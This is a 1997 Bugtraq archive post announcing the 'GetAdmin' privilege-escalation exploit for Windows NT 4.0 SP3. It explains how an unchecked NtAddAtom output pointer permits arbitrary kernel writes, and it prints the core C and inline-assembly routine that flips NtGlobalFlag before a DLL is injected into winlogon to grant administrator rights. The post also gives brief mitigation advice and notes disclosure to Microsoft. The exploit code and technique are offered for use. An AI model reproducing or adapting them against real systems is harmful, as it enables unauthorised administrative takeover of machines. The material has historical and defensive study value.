Bugtraq mailing list archives
GetAdmin NT exploit
From: cklaus () ISS NET (Christopher Klaus)
Date: Tue, 8 Jul 1997 11:19:00 -0400
Windows NT 4.0 Exploit: Allows intruders to become administrators on machine. Works on Windows 4.0 with Service Pack 3 installed. Web: http://cmp.phys.msu.su/ntclub/pub/code.htm GetAdmin source code. Here's my program GetAdmin. This program can get administrator rights without any special privileges. Simly run GetAdmin or GetAdmin account_name from command line. If you not enter account_name current account will be used. How it works? Here's string that done all in getadmin: ChangeNtGlobalFlag(GetNtGlobalFlagPtr()); After that you can open any process in system, becose function NtOpenProcess not checks for SE_DEBUG_PRIVILEGE if bit in NtGlobalFlag+2 is set.After it , program injects dll in winlogon process. Winlogon have SYSTEM account so it can add / remove user in administrator group. Function ChangeNtGlobalFlag : BOOL ChangeNtGlobalFlag(DWORD pNtGlobalFlag) { DWORD callnumber = 0x3; //NtAddAtom DWORD stack[32] ; int i; DWORD handle=0; CHAR string[255]; if(!pNtGlobalFlag) return 0; stack[0] = (DWORD)string; stack[1] = (DWORD)&handle; //pNtGlobalFlag; for(i=0;i ? 0x100;i++) { sprintf(string,"NT now cracking... pass %d",i); if(handle & 0xf00){ stack[1] = (DWORD)pNtGlobalFlag+1; } __asm{ mov eax, callnumber; mov edx, stack; lea edx,dword ptr [stack]; int 0x2e; } if( stack[1] == pNtGlobalFlag+1) break; } return TRUE; } Bug is that subfunction in NtAddAtom not checks address of output . So possible to write in any space of kernel memory. Of curse it not necessary inject dll to winlogon, to get admin rights you can simply patch same place of ntoskernel , or replace process token and e.t.c.If you have get full source code please click here. Preventing the Attack: Only one really way : patch ntoskernel and replace function NtAddAtom so it checks for valid address. You can remove all access from ntoskernel but it possible to enter fixed address of NtGlobalFlag in getadmin. And exist other ways to get administrator rights if you can write to kernel memory. I informed Microsoft about this 30 Jun 97. Konstantin Sobolev.
Current thread:
- Re: Solaris 2.5.1 party piece Davin Milun (Jul 03)
- Re: Solaris 2.5.1 party piece Casper Dik (Jul 03)
- Vulnerability in websendmail Razvan Dragomirescu (Jul 04)
- tar-error inter (Jul 05)
- Solution to MacDNS problem (keywords MacDNS DNS Macintosh Dan Brown (Jul 07)
- Vulnerability in websendmail (fwd) Julian Assange (Jul 07)
- Alert: Utility allows any user to become a member of local Admini Aleph One (Jul 08)
- Re: Vulnerability in websendmail Randal Schwartz (Jul 08)
- SGI Security Advisory 19970502-02-PX - xlock Vulnerability SGI Security Coordinator (Jul 08)
- Buffer Overflows exploit for SunOS 4.1.4 Willy TARREAU (Jul 08)
- GetAdmin NT exploit Christopher Klaus (Jul 08)
- Inside GetAdmin Mark Joseph Edwards (Jul 08)
- Fw: Reported Proxy-Netscape Bug Mark Joseph Edwards (Jul 08)